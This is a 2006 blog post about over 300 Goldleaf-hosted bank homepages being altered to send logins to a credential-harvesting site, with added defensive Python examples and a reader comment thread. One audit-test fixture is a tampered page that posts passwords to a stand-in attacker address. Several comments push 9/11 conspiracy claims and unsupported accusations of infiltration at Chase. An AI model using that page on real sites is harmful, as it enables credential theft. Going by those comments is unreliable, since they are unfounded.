
300+ Bank homepages hacked and redirected!

By George Ou | June 1, 2006, 12:11am PDT

Summary: A little more than half of the 600 bank sites hosted by Goldleaf were modified to redirect traffic, which puts the number of banks affected at over 300. The homepages of those banks were altered so that they sent all online banking traffic to a malicious site in Madrid, Spain, that collected login credentials from unsuspecting customers.

Goldleaf Technologies, a unit of Goldleaf Financial Solutions, Inc. that provides homepage hosting for banks and other financial institutions, had one of its servers hacked last Thursday, May 25th. I was initially alerted to this by a concerned customer who received an email notice from his bank that ALL customer passwords had been reset to their default password. Several news outlets covered the story merely by posting Goldleaf's official press release verbatim, which characterized the breach as a "phishing incident", so the details were initially murky.

The AP wire was one of the few that characterized the incident as a security breach, and it quoted a Goldleaf spokesperson saying that 150 to 175 sites were affected. When I asked Goldleaf's spokesperson, he characterized the AP figure as wrong and told me that a little more than half of the 600 hosted bank sites had been modified to redirect traffic, which puts the number of banks affected at over 300. The homepages of those banks were altered so that they sent all online banking traffic to a malicious site in Madrid, Spain, that collected login credentials from unsuspecting customers.

While this is technically similar to phishing, it isn't the same thing. Phishing normally involves spoofed email that purports to be from the bank but is really sent by criminals, with legitimate-looking links that lead to a malicious web page. In this case the actual bank homepage is what redirects you to the malicious site, which can only happen if the bank's homepage, or the server hosting it, was compromised. That is more dangerous, because customers reasonably expect to be safe on the real banking site: they typed or bookmarked the bank's own address and had no reason to suspect the page that came back.

Goldleaf representatives were extremely careful not to use the word "hack" and instead focused on the word "redirect". This isn't surprising, since a card-payment processor effectively went out of business within weeks of a hacking incident. In Goldleaf's defense, their security administrators noticed and stopped the malicious activity within 90 minutes of the initial compromise, and they immediately notified the authorities and all of the banks they were hosting. The problem is that Goldleaf's servers were hacked in the first place, but at least they were quick to respond. Ninety minutes is still a long time for a credential-harvesting page to be live: any customer who logged in during that window should assume their credentials were captured, which is presumably why the banks reset passwords.

The truth of the matter is that this type of exploit isn't a whole lot different from banks not using SSL for their online banking login page, which I have been hammering on lately: in both cases the page that collects the password can be altered by someone other than the bank before it reaches the customer, on the server in Goldleaf's case, in transit in the non-SSL case. Goldleaf at least fixed their issue in a matter of hours, while I still can't get banks to implement SSL after weeks. Even when I followed up on the subject and called Chase and American Express, I was given the run-around by public relations: someone will get back to me, but I haven't heard a thing in weeks. When banks are this lackadaisical about e-commerce security and customer data, it doesn't help the security situation, and all of us as consumers end up absorbing the losses through higher prices for goods.

The banks complain about email phishing scams, but they won't even do something as simple and inexpensive as putting S/MIME digital signatures on official email notifications to their own customers. S/MIME is a widely supported standard: most desktop email clients can verify a signature and decrypt a message with it, so a signed notification lets the customer's mail client tell a genuine bank message from a forged one, provided the bank tells its customers to expect signed mail and to distrust anything unsigned. It seems like until there is more pressure on the banking institutions to do the right thing, they're going to continue being sloppy as usual. As a customer of one of the guilty non-SSL banks, I'm considering changing to a bank that cares a little more about security if mine isn't willing to change.
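As an added example (not code from the original post, from Goldleaf, or from any bank), here is the kind of check a hosting provider's monitoring, or a suspicious customer, could run against a fetched homepage to catch exactly this tampering: does the password form post over HTTPS to a host the bank owns, and does anything on the page bounce the visitor somewhere else? The hostnames examplebank.test and online.examplebank.test, the TEST-NET address 203.0.113.7 and the three sample pages are constructed, and the trusted-host list is an assumption about what the bank actually owns. The last sample covers the case raised later in the comment thread, a homepage served over HTTP whose login form posts to an HTTPS URL: nothing on such a page is authenticated, so the HTTPS action is exactly what an attacker would change.

```python
"""Audit a bank homepage for login-form tampering and off-site redirects.

Added example; not Goldleaf's or any bank's code. Constructed sample pages only.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Hostnames the bank actually owns (assumption for this example).
TRUSTED_HOSTS = {"www.examplebank.test", "online.examplebank.test"}
PAGE_URL = "https://www.examplebank.test/"

# Inline-script redirects of the form `location = "..."`, `window.location.href = '...'`.
_JS_REDIRECT = re.compile(
    r"""(?:window\.|document\.)?location(?:\.href)?\s*=\s*['"]([^'"]+)['"]""")


class _PageCollector(HTMLParser):
    """Collects forms with a password field, <meta refresh> targets and script text."""

    def __init__(self):
        super().__init__()
        self.forms = []          # each: {"action": str, "password": bool}
        self.meta_refresh = []   # redirect targets from <meta http-equiv="refresh">
        self.script_text = []    # raw text of inline <script> blocks
        self._form = None
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._form = {"action": a.get("action", ""), "password": False}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            if a.get("type", "").lower() == "password":
                self._form["password"] = True
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = re.search(r"url\s*=\s*['\"]?([^'\"\s;]+)", a.get("content", ""), re.I)
            if m:
                self.meta_refresh.append(m.group(1))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.script_text.append(data)


def audit_homepage(page_url, html, trusted_hosts):
    """Return a list of findings; an empty list means the page looks intact."""
    page = _PageCollector()
    page.feed(html)
    findings = []
    page_is_https = urlsplit(page_url).scheme == "https"

    for form in page.forms:
        if not form["password"]:
            continue                       # only credential forms matter here
        target = urlsplit(urljoin(page_url, form["action"]))   # resolve relative actions
        if target.hostname not in trusted_hosts:
            findings.append(f"login form posts credentials to untrusted host {target.hostname}")
        elif target.scheme != "https":
            findings.append("login form posts credentials over plain HTTP")
        elif not page_is_https:
            # HTTPS action on an HTTP page: the form itself is unauthenticated, so an
            # on-path attacker or a compromised host can rewrite the action at will.
            findings.append("login page served over HTTP; its HTTPS action cannot be trusted")

    for dest in page.meta_refresh:
        host = urlsplit(urljoin(page_url, dest)).hostname
        if host not in trusted_hosts:
            findings.append(f"meta refresh sends visitors to untrusted host {host}")

    for m in _JS_REDIRECT.finditer("".join(page.script_text)):
        host = urlsplit(urljoin(page_url, m.group(1))).hostname
        if host not in trusted_hosts:
            findings.append(f"script redirects visitors to untrusted host {host}")
    return findings


# Constructed sample pages (not captured from any real bank).
CLEAN_PAGE = """<html><body>
<form method="post" action="https://online.examplebank.test/login">
  <input type="text" name="user"> <input type="password" name="pass">
</form></body></html>"""

# The same page after a server-side edit: the form now posts to an attacker's
# host and a script bounces the visitor there too (TEST-NET address, constructed).
TAMPERED_PAGE = """<html><head>
<script>window.location = "http://203.0.113.7/login";</script></head><body>
<form method="post" action="http://203.0.113.7/login">
  <input type="text" name="user"> <input type="password" name="pass">
</form></body></html>"""

# Untampered, but served over HTTP: the HTTPS action is unverifiable.
MIXED_PAGE = CLEAN_PAGE
MIXED_PAGE_URL = "http://www.examplebank.test/"

if __name__ == "__main__":
    for name, url, html in (("clean", PAGE_URL, CLEAN_PAGE),
                            ("tampered", PAGE_URL, TAMPERED_PAGE),
                            ("http homepage", MIXED_PAGE_URL, MIXED_PAGE)):
        print(name, "->", audit_homepage(url, html, TRUSTED_HOSTS) or "no findings")
```

Run against a live fetch, this belongs in the hosting provider's monitoring loop rather than in the customer's hands; a diff of the served page against the last approved copy would have flagged the Goldleaf edit within seconds instead of 90 minutes. Note the check is only as good as the trusted-host list, and it says nothing about a redirect done at the HTTP layer (a 302) before any HTML is returned, which a monitor should check separately.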


George Ou
http://blogs.zdnet.com/Ou/?page_id=557

Biography

George Ou, a former ZDNet blogger, is an IT consultant specializing in servers, Microsoft, Cisco, switches, routers, firewalls, IDS, VPN, wireless LAN, security, and IT infrastructure and architecture.

Comments

Solution: SARBANES OXLEY
thegestunkenaraygun 9th Jun 2006
I know that the banking industry is usually subject to its own regulatory regime, but SOX has got to be in the minds of the auditors. It's a pain in the butt, but making top management personally liable when material defects in the controls over financial accounting are identified and not addressed is a big incentive to fix this kind of stuff.
0 Votes
Arnout Groen 1st Jun 2006
First:
And how often are you planning to be in Europe, George? (In Europe we can log in safely to our bank accounts.)

Second:
That 90 minutes response time could be much longer when the 'hackers' started their hack from their living area 'somewhere' in Asia in the morning. In that case, US banks are closed and won't open for another 12 hours, thus enlarging the window of opportunity for stealing login credentials.

"Unless there are other safety measures in place"
0 Votes
Ok, rub it in
georgeou 1st Jun 2006
Ok, rub it in on us Americans. Yeah yeah, I know the European banks don't do this and they often use smartcards.
0 Votes
But why..
Arnout Groen 1st Jun 2006
don't they (US banks) use them?

I can't believe that US banks consist of a bunch of mules, donkeys and morons.... (Well, perhaps they are on a technological level).

In Europe, login into a bank account goes something like this:

Username = bankaccountnumber + cardnumber
You'll get a login code from the bank, which you enter into your identifier... You'll get a response, which is your real login code to get access to your bank account.

To provide that login code a few input parameters are necessary for an algorithm: account number, card number, Personal Identification Number, current date/time.

This is just an extra layer of defence against abuse. (WE use SSL). How is this done in the US?
0 Votes
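A working model of the challenge-response login Arnout describes, added here as an example; it is not code from the post, from any bank, or from any real card reader. The account number, card number and PIN are constructed sample values, and deriving the token secret from them with PBKDF2 is an assumption made only so the example is self-contained (a real reader keeps the secret on the card chip and checks the PIN locally; the date/time input Arnout mentions is replaced here by a server-side expiry on the challenge). It also shows what this buys against the Goldleaf-style attack: a code captured by a fake login page is bound to one challenge and is useless for any later login, although a fake site that relays the bank's real challenge in real time can still use that one code once.

```python
"""Challenge-response login with a handheld token (model of the scheme in the comment above).

Added example with constructed values; not any bank's or card vendor's code.
"""
import hashlib
import hmac
import secrets

CHALLENGE_LIFETIME_S = 120   # assumption: a challenge is valid for two minutes
KEY_ITERATIONS = 100_000


def derive_token_key(account_number, card_number, pin):
    """Secret shared by the customer's token and the bank.

    ASSUMPTION: derived from account, card and PIN only to keep the example
    self-contained. A real reader stores the secret on the chip and rejects a
    wrong PIN locally; here a wrong PIN simply yields a wrong key.
    """
    salt = f"{account_number}:{card_number}".encode()
    return hashlib.pbkdf2_hmac("sha256", pin.encode(), salt, KEY_ITERATIONS)


def token_response(key, challenge):
    """What the handheld 'identifier' computes: an 8-digit code bound to this challenge."""
    digest = hmac.new(key, challenge.encode(), hashlib.sha256).digest()
    return f"{int.from_bytes(digest[:4], 'big') % 10**8:08d}"


class BankServer:
    """Bank side: issues single-use challenges and verifies the token's answer."""

    def __init__(self):
        self._keys = {}      # username -> token key
        self._pending = {}   # username -> (challenge, issued_at)

    def enroll(self, username, key):
        self._keys[username] = key

    def start_login(self, username, now):
        """Step 1: the bank shows a random challenge for the customer to type into the token."""
        challenge = f"{secrets.randbelow(10**8):08d}"
        self._pending[username] = (challenge, now)
        return challenge

    def finish_login(self, username, response, now):
        """Step 2: verify the token's code. The challenge is consumed whatever the outcome."""
        pending = self._pending.pop(username, None)
        key = self._keys.get(username)
        if pending is None or key is None:
            return False
        challenge, issued_at = pending
        if now - issued_at > CHALLENGE_LIFETIME_S:
            return False                                  # stale challenge
        expected = token_response(key, challenge)
        return hmac.compare_digest(expected.encode(), response.encode())


def run_scenario():
    """Genuine login, then the replays a phishing site could attempt. Returns name -> accepted?"""
    bank = BankServer()
    key = derive_token_key("0123456789", "4111111111111111", "1234")   # constructed values
    bank.enroll("customer", key)
    results = {}

    c1 = bank.start_login("customer", now=1000.0)
    r1 = token_response(key, c1)
    results["genuine"] = bank.finish_login("customer", r1, now=1010.0)
    # Same code presented again: the challenge was consumed by the first attempt.
    results["replay_same_challenge"] = bank.finish_login("customer", r1, now=1011.0)
    # A fake page captured r1 earlier; the attacker now starts a real login and replays it.
    bank.start_login("customer", now=2000.0)
    results["phished_code_later"] = bank.finish_login("customer", r1, now=2005.0)
    # Correct code, but the challenge has expired.
    c3 = bank.start_login("customer", now=3000.0)
    results["expired"] = bank.finish_login(
        "customer", token_response(key, c3), now=3000.0 + CHALLENGE_LIFETIME_S + 1)
    # Wrong PIN: a different key, so a different code.
    c4 = bank.start_login("customer", now=4000.0)
    wrong_key = derive_token_key("0123456789", "4111111111111111", "9999")
    results["wrong_pin"] = bank.finish_login("customer", token_response(wrong_key, c4), now=4001.0)
    return results


if __name__ == "__main__":
    for name, accepted in run_scenario().items():
        print(f"{name:>22}: {'accepted' if accepted else 'rejected'}")
```

The point of the single-use, short-lived challenge is that harvesting pages like the one the Goldleaf redirect pointed to collect nothing reusable. What it does not stop is a proxying fake site that forwards the bank's challenge to the victim and the victim's code back to the bank inside the lifetime window; that needs transaction signing (the token also signs the amount and payee) rather than login-only authentication.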
The Majority of Americans fit into 3 stereo types: Fat, Lazy, and Stupid.

Most companies work along a re-active instead of pro-active standard. This involves everything. until something goes wrong, why should we fix it? Most Americans don't care to change their ways either. Consumers are as bad as the companies they buy from. They choose to eat out more rather than cook at home. And if they choose to cook at home, they have to have something that requires little more than a microwave or possibly use the stove.

Until Americans and I mean all Americans, refuse to change their instant gratification mentality, they will continue to become lazier and more complacent and lose their #1 spot in the world.
0 Votes
LOL
Linux Advocate 1st Jun 2006
You type the truth... and yet someone will come and bash you for it and that is the pity!
0 Votes
Oh, that's why...
Arnout Groen 1st Jun 2006
One of our politicians is going to work at the American Enterprise Institute.

A big chance her deception and deceit won't be noticed by Americans.
0 Votes
Oh We will notice
nucrash 1st Jun 2006
We just will be too lazy to care or do anything about it. In the US, Stupid is really the wrong way to describe Americans, I just use it hoping that some one will try to prove me different.

The most any Americans would probably do is complain at the water cooler. Past that, Americans just don't care to act. Usually too inconvenient. Even if they do, they are easily misled to assume that a solution is an easy one. Such as with gas prices, they think that biofuels or hybrids will make the evil oil companies go away. Some of them don't care to consider moving closer to work or walking, or finding some mass transit system. I am amazed that over in Japan, they have a huge number of parking spots at manufacturing facilities for bicycles. At my place, even though I live right outside of town, there is space for a total of 10 bikes. This is a factory that employs over 1000 people. I think I've seen 3 bikes at the most used. One of the people who uses it is Chinese. Wonder why that is.

Americans can't use common sense to fight the battle of the bulge. They would rather go spend money at the gym rather than walk to work. Guess which one would save more money?

I know that this rant is lengthy, but I can't help but be pissed at the gross complacency of my nation. After all, I want to take a girl out this weekend, I have to spend $50 just to get her there and back because Joe Blow is too lazy to walk to work. I would rather spend that money on the hard working waitress that will be serving me. Or maybe a new iMac just to argue with George more on that subject.

Another example that continues to piss me off is the cities of the US. People get sick of a neighborhood looking trashy, so they move just outside of town to a newly developed suburb, then it gets trashed, and they move to another suburb. Soon you have 12346239147 trashed suburbs and a dying downtown and you can't figure out why downtown can't get business, rent apartments, or look decent. Cityfolk, fix your neighborhoods up before moving out of them. New York City is making great strides to fix up a lot of their neighborhoods. St. Joseph, Missouri is another place that is trying to promote cleaner neighborhoods. Take up after them. Then quit sprawling and get a mass transit system.

One last thing that I wish would make a comeback is the railway system. I think that would help transportation through most of America. Our rails are crap and they need to be fixed.

Egad, with all that wind, perhaps I should take a stab at politics.
0 Votes
Well...
Arnout Groen 1st Jun 2006
Enjoy the weekend with your girlfriend, but get used to spending money if you're building up a serious relationship. (E.g.: why spend money on a new iMac, we need to redecorate the house or you/I need to buy new clothes.)

Maybe it's cheaper to date George. After all:
He's got 2 jobs, can pay for his own meal and hardware and can participate in a dinner table discussion about hard/software.

NO HARD FEELINGS George... (just to make sure)

About cleaning up your neighborhood; I agree on that point, but remember that's an educational issue. If children don't learn to clean up their mess, how do you think they will act as grown up adults?

About the railway system: what's the chance they'll improve? From what I know about the US, probably zero. That is, as long as your (US) airlines are selling tickets at dumping prices and oil and gas are relatively cheap. (In Europe we pay 1.5 US dollars a litre.)
0 Votes
nice rant
shraven 1st Jun 2006
So, are you one of the other 2 bikes at your work, or are you just full of crap about how other people are the problem?
0 Votes
I am part of the problem
nucrash 1st Jun 2006
I won't deny that I am part of the problem, but I am slowly trying to fix my problem. If I set the example, will I lead the way? Probably not, but for those who do, I gladly cheer on.

If I haven't given up my car, you may ask what do I do to help become less of a problem. I walk to the local taverns instead of drive, which saves on gas and DUIs. They are about a mile away. I walk to my gym, which is about half a mile away. I cut down on using electricity by not watching the tele and reading a good book instead, "Hacker's Handbook" was last night. I don't eat out as much as I used to, which cuts out on the economy, but is better on my health. I don't own an SUV, but instead a Super Charged car, which I guess is still part of the problem. I refuse to drive a hybrid though, I feel that the long term effects of the battery are not any better for the environment than the gasoline engines.

I do work out more and strive to expand my knowledge by learning Nihongo written and spoken. Still having a tough time on the Kanji Characters. My goal is also to learn Hangul and Espanol.

So... Am I fat, lazy, and stupid? Sure, but at least I am making an effort to counter that.

I figure I will be ready to start biking to work some time in July. I want to be in shape first.
0 Votes
Wow! You are so on
999ad@... 1st Jun 2006
the money!!!! Well put observation.
0 Votes
yup, too true, and it DOESN'T hurt for me to say it
Spicoli the Cannoli 1st Jun 2006
I am sick and tired of the average American's mentality. The average American wants EVERYTHING served up on a silver platter, and doesn't want to work even ten seconds for it.
Not only that, but on top of it, Americans have this elitist attitude like they're better than the rest of the world, and "rightfully" so. They feel like the higher standard of living America has over most other countries is because Americans somehow are just "better" people and are more "with it", and not because the US government has been aggressively raping the world since the second half of the 20th century.
Most Americans have never even held a gun in their whole lives, and yet feel "justified" in illegally invading one country after another on the drop of a whim.
The only reason Americans are marginally interested in politics nowadays is because finally the US government is coming to bankrupt and enslave them, like it has been doing to the rest of the world for decades. So their interest is PURELY self-interest, and thus can't be looked at as though it's in any way noble.
Americans are NEVER going to change their instant gratification mentality, because they don't want to, and big industry is only to happy to keep cashing in on Americans' seemingly endless indulgent desires.
Americans value entertainment MUCH MORE than they do real freedom, which is precisely why America is being dismantled with what seems relative simplicity.

We're coming up to the 5th anniversary of 9/11, a mass homicide carried out in broad daylight, and STILL there has not been an official thorough investigation. How can anyone possibly sympathize with a people who are OK with mass murder not being investigated? I hate to say this, but apparently Americans are deserving of more 9/11s, and they will get them at some point in the future..and considering how easily the US government was able to snooker people with 9/11, I unfortunately will not be the least bit surprised when the government fights tooth and nail to avoid an official investigation into whatever future terrorist acts occur on US soil, destroy most all the evidence, needlessly classify the rest, and then try to shame anyone that dares question whatever sorry scientifically impossible conspiracy theory the US government expects everyone to believe without suspicion..
..and Americans will swallow another round of horse crap like good wittle complacent slaves..
0 Votes
I don't take your dim view of Americans (I am one), but I thought most of your criticisms had some merit.

"We're coming up to the 5th anniversary of 9/11, a mass homicide carried out in broad daylight, and STILL there has not been an official thorough investigation."

Oh I see. So the 9/11 Commission was just a whitewash then? Sorry, that doesn't wash with me. The closest thing we've had to a legitimate challenge to the 9/11 Commission's findings was an investigation into a purported Pentagon-authorized operation called "Able Danger". The accusation was that the people in on the operation had gathered information about some of the 9/11 hijackers before the attack, but were blocked from sharing it with authorities who could've acted and maybe stopped the attack before it occurred. The whistleblowers on the matter didn't dispute that the hijackers were in fact the ones the government named, but rather claimed that Able Danger had information on a few of them in 2000, during the closing months of the Clinton Administration.

"and then try to shame anyone that dares question whatever sorry scientifically impossible conspiracy theory the US government expects everyone to believe without suspicion..
..and Americans will swallow another round of horse crap like good wittle complacent slaves.."

You know I think more Americans would listen to you if you'd lay off the conspiracy theory crap. Making general statements of this nature isn't going to get you any legitimacy.
0 Votes
try learning more..
Spicoli the Cannoli 2nd Jun 2006
..yes, the 9/11 Commission WAS a whitewash, but more importantly, it was not an investigation into the crime itself but rather the supposed "intelligence failures". This would be like a police department calling off an investigation into a homicide, and instead "investigating" why police didn't respond quickly enough to the victim who called in to report a break-in, as though this makes up for investigating the crime itself.

"The closest thing we've had to a legitimate challenge to the 9/11 Commission's findings was an investigation into a purported Pentagon-authorized operation called "Able Danger"."

Well, you see, once again if you were more informed you'd know that there were so many discrepancies in what was presented at the 9/11 Commission that an entire book was written on it!

"You know I think more Americans would listen to you if you'd lay off the conspiracy theory crap."

People like yourself truly make me laugh. You attack anyone that questions 9/11 as a conspiracy theorist, and yet don't even stop to think and realize that what the US government has presented as the "official version" of events is ALSO a conspiracy theory!!!..unless you can point me to all that ample freely available HARD EVIDENCE conclusively proving beyond all doubt that Osama bin Laden and Al-Qaeda were the true sponsors of 9/11..either cough up the evidence, or continue to look like a MORON..
0 Votes
Speak for yourself, Spicoli
Mark Miller 2nd Jun 2006
I saw a videotape the military had recovered from Afghanistan where bin Laden discusses with his cohorts how he watched the attacks on TV. In it he discussed that he knew when they were going to happen, and he knew how many planes he was expecting to hit targets.

In an audio recording of a meeting he had with others, he discusses how he noticed that there was supposed to be a 4th plane to hit a building that didn't hit its target.

In the videotape he also talked about how he was surprised that the towers collapsed so completely. He said he debated with his collaborators before the attack about how much damage the planes would do to the WTC. He said he expected that the floors above the crash site would collapse/fall over, but that the lower floors would remain standing. He attributed the total collapse to "the hand of Allah", crushing them.

I saw/heard these tapes on cable news, as well as other cable outlets. I may have seen the videotape on the internet as well. I was very interested in reading the whole translated dialog, which was shown in subtitles below the video. All of their discussion was of course in Arabic, a language I'm not familiar with. So I had to count on the government's translators to understand what they were saying.

Secondly, documents were recovered from Mohammed Atta's living quarters, which spoke in a kind of coded language about which buildings they were going to hit. One of them I remember was called something like "the ministry of defense" (the Pentagon), the other, which did not get hit, was "the house of legislation". Again, what I learned of them was what was translated from Arabic into English.

Thirdly, I heard the story about how the airline stewardess on one of the flights that crashed into the WTC phoned in to her airline the names of the passengers who were the hijackers. She passed on the information during the hijacking, but before the crash, of course. She had the passenger manifest, and knew where they were sitting before the attack commenced on her flight. This list was then passed on to the FBI, I believe. All of the names she mentioned sounded Middle Eastern. Mohammed Atta was one of the names on her list. The government gathered up the other passenger manifests for the other flights that crashed. They took the known list from the flight attendant on the one flight that crashed into the WTC and drew connections to the other hijackers on the other flights. How they did this, I don't know. It's possible they used CIA information, but I'm just speculating. Some of the hijackers were people that the CIA had on its list of known terrorists, before the attack occurred. The problem was that the CIA had little to no relationship with the INS, the agency that handles immigration matters. Secondly, even if the CIA had information, it would've been difficult for them to act. There was a legal wall of separation between the CIA and FBI. The CIA was forbidden from taking actions within the U.S. It's the FBI's job to do that, but they're strictly in the mode of prosecuting criminals. They would have had a hard time accepting information from the CIA, since the FBI cares about proper gathering of evidence for presentation in court. In general, the government was not organized to anticipate this sort of attack. It was organized to fight the Cold War, which had been over for more than 10 years. Nobody said the government is organized efficiently.

So yes, I'm convinced that Al Qaeda committed this act of war. You'd have to convince me of a lot of other things for me to believe that the government coordinated the attack on itself.
0 Votes
Fat, Lazy, and Stupid.
Jack-Booted EULA 1st Jun 2006
You missed the arrogance, intolerance, and greed.

:o)
If anyone's lazy, the Europeans work far less than Americans. As for the other stuff, I'm sure you probably feel that the rest of the world is better, especially the terrorist nations.
0 Votes
hmmm.
Jack-Booted EULA 1st Jun 2006
There you go jumping to conclusions and making assumptions, again.

And what exactly do terrorists have to do with the premise presented, cupcake?

But, come to think of it, I'd be willing to guess that they're anything but fat or lazy. Stupid, maybe, esp. the ones that get caught.

:o)
"Stupid, maybe, esp. the ones that get caught."

We can't have the terrorists getting caught now could we.
0 Votes
There's a general difference between...
Arnout Groen 2nd Jun 2006
Europeans and Americans....

You live to work, while we work to live.

This doesn't mean every European and American lives by this rule.
0 Votes
I'd be careful with that
Mark Miller 2nd Jun 2006
I'm not sure how this happens, but I've heard it said that the French are actually more productive than we are...while they're working, at least. They take 6 weeks off out of the year. Maybe the reason they are more productive is they're rested? Or maybe they're playing with statistics. I dunno. I can accept the argument that with increased hours on the job, comes increased fatigue and diminishing returns. Maybe that explains it.
0 Votes
And yet...
nucrash 2nd Jun 2006
Who are you criticizing about security? And who are you complimenting about security?

My Fat, Lazy, and Stupid comment falls to the general populace. Not that we don't have some of the most elite individuals in the world in this nation. How else did we become the computing power that we now are?

Real World IT should see it just as much as anyone else. Americans have become complacent and complain about losing jobs to overseas markets instead of thinking of new ways to create jobs.

I am proud of what this nation has accomplished, and feel that this nation isn't done yet. But being the top dog only means that everyone else in the world is now wanting your spot. Reasons why I fear China and India: because of their sheer manpower and will to take it.

Unfortunately, I don't feel that I, nor many of the people in this area care to do enough to keep the United States in the top spot.

Just my not so humble opinion.
0 Votes
Fat lazy and stupid?
georgeou 1st Jun 2006
Americans are among the few in the world willing to criticize themselves. Europeans are far lazier than Americans if you look at their work patterns. As far as fat, that's a sign of wealth in most places. As far as stupid, I guess everyone likes to call the most successful person on the block stupid.
0 Votes
About half the USA banks do
georgeou 1st Jun 2006
About half the USA banks do and half don't. It's stupid and I'm trying to change that.
Until recently ONLY California had actual LAWS to inform affected individuals in cases of ID theft; so someone can snatch your personal ID and the custodian of this information (banks or credit card or credit bureau, etc.) did not have to notify you of it.

Recently some more states passed laws to .... safeguard personal id data !

It is AMAZING that in a consumer SUPER-oriented society it is the consumer who is NOT much safeguarded against organized crime....
0 Votes
Windows with IIS and ASPs. That's awesome for secure banking.

(Just incase you missed the sarcasm.)
0 Votes
Banking Authentication
brandie.anderson@... 1st Jun 2006
In an effort to put your mind somewhat at ease, I just wanted to let you know the FFIEC (Federal Financial Institutions Examination Council) has issued a January 1st, 2007 deadline for all U.S. banks requiring secure online access. While there are no audit specifications, most believe a simple username/password combination will cause the banks to fail.
0 Votes
That's not the issue
georgeou 1st Jun 2006
I don't care how many questions they ask me like where I was born or what picture I selected when logging in, it's all useless if the site doesn't use SSL for the default login page.
0 Votes
So SSL wasn't being used
ebrke 1st Jun 2006
on these login sites that were redirected? Could people have protected themselves from this by looking for the security certificate? If so, this would appear to add weight to your recent columns, George.
And you'll get a long, deep stare.
0 Votes
the typical home user
Yagotta B. Kidding 1st Jun 2006
How about the admins at the banks? What's scary is that they don't know what they are.

My concern isn't what the "typical home user" knows, because they'll take what the admins give them. I'm more concerned about the fact that the knowledgeable user doesn't have the choice of reasonable security.

"I'm more concerned about the fact that the knowledgeable user doesn't have the choice of reasonable security."

Switch banks, talk to your bank.. At least you know the issue.

Un-informed, or the uneducated (which is the majority of home users) have no idea what SSL is, have no idea what a secure connection is..

Heck try convincing them to even use online banking? Many won't because they don't trust it.. And things like this just add fuel to the fire.
I don't believe it's the be-all end-all approach since most don't even pay attention or even know what that little lock means.

How do you get customers to know they are on a secure connection? How do we get them to know they are being redirected to another "mischievous" site?

How do security people like yourself educate users enough to know the signs?
0 Votes
You're right, but a different fight
georgeou 1st Jun 2006
"I don't believe it's the be-all end-all approach since most don't even pay attention or even know what that little lock means."

You're right Ju1ce, but it's basic security that the banks should be implementing.
0 Votes
I don't think it is...
ju1ce 1st Jun 2006
Since even if pages were "redirected" from supposed "secure sources", regular consumers would know what to watch for and hence avoid it should it arise.

I think SSL in its entirety is a basic security that shouldn't be relied on as the be all end all.

Even if the site had SSL and was phished.. Would it really have stopped it? I'm going to say it with 100% confidence that no, it wouldn't.

That basic security is the problem, but also the person between the keyboard and chair.

It's funny how computers have made people so dependent on others for security when before computers people relied on common sense and proven methods. :P Instead they leave it up to "supposed" experts (no cut against you in this regard George) to do it for them, and then cry about it when they can't stop something.

Even security experts are human. And security experts make mistakes, and are really at the mercy of the programs/tools they use.
0 Votes
"when before computers people relied on common sense and proven methods"

Really? There is a reason that common sense isn't so common. I don't disagree with you that SSL isn't enough, that doesn't mean it's an excuse NOT to use it which is often the case. I hear too many people saying that SSL isn't perfect so why use it.
0 Votes
Oh George.. I agree use it.
ju1ce 1st Jun 2006
As I said.. But it isn't the be all and end all of user sense.
0 Votes
It's worse than you think
progan01@... 1st Jun 2006
My bank was recently absorbed by JP Morgan-Chase (now usually just called "Chase"). Prior to the merger, I visited the Chase.com site to read their online banking and user privacy policies.

Twenty minutes after I visited the site, I got a phishing note telling me my Chase account had been compromised, and to please click on this link to verify. I reported the incident to the FTC, to Chase and to my own bank. That's a pretty fast exploit from visiting Chase.com. It told me that the Chase.com site has been compromised by a sniffer, and probably has for some time.

That was only the first of many such attempted frauds, but the real struggle was convincing Chase.com that the problem was within their own site and possibly inside their own networks. I'm not sure I got through to them.

But more recently I had all confidence in Chase's ability to maintain user security removed by the following incident.

Chase.com switched my secure login page to a non-secure login page. No SSL, as my old bank had used. The fields for user ID and password were on a non-secured page, and apparently transmitted in the clear.

I sent in an e-mail complaint through their contact link. I got back, in five days, an e-mail saying that the issue was too complicated for a response by e-mail and to please call their tech help line during working hours.

My call went badly. After navigating the automated vestibule, the first help contact did not understand the issue. She referred me to a second help contact who was only slightly more knowledgeable. He was initially unable to help me because, as he attempted to get to the Chase.com site, his computer froze and he had to reboot.

He did not seem to know about secure socket layer encryption. He had no supervisor on the site willing to come on the line -- though apparently he or she was monitoring the call from nearby, as my help contact twice put me on hold to ask questions.

I finally received the answer from this Chase.com technical help rep that the FIELDS in the non-secured form in fact WERE secured. And that he could prove it. All he needed to prove it was for me to type in my ID and password and show me how I would be connected to my secure site!

This, I informed him, was exactly what I would NOT do. There was no way to verify on my end that the transaction was in fact secured. He had no other way of showing me that in fact the transaction WAS secure except to have me go through an unsecured access page.

The help contact's ignorance apparently was not personal. He had been trained in courtesy and phone manners. He really was uninformed about Web security and about SSL encryption. I have to think this was deliberate Chase policy.

So Chase.com actually removed security from their homepage for user 'convenience' and put unknowledgeable help personnel on their phone banking lines equipped with erroneous information -- perhaps deliberately misleading information intended to lull an unsuspecting public about Chase.com online banking security.

Since Chase.com had their accounts hacked two months ago by someone redirecting customer information to a network belonging to one of their Chinese partner banks, this exchange with Chase.com tells me that their security is in fact culpably weak, and was deliberately made weaker. This suggests to me that Chase.com may not only have had its systems compromised, but that there may be agents of foreign powers or criminal organizations already in place within the Chase.com organization who are feeding customer information to unauthorized hands.

In any case, Chase.com is a dangerously unsecure banking environment. I have no faith in their computer system, their IT staff, their security policy, or indeed their ultimate purposes as a bank. They appear to have been penetrated technologically and they may have been infiltrated by people with an interest in weakening Chase.com security for nefarious and fraudulent purposes. The scale of this fraud and its ultimate ends can scarcely be guessed at. If somebody were to suggest that Hizbollah or Al Qaeda had operatives inside Chase.com I could not refute them.

The Chase.com homepage remains unsecure to this day. Take a look: http://www.chase.com/

You'd better check your own bank site. And I mean today. The credit history you save could be your own.
0 Votes
No fan of chase, but...
Sxooter_z 1st Jun 2006
I'm no fan of chase, seriously. My ex wife is moving her accounts from there as we speak due to their incredibly poor customer service.

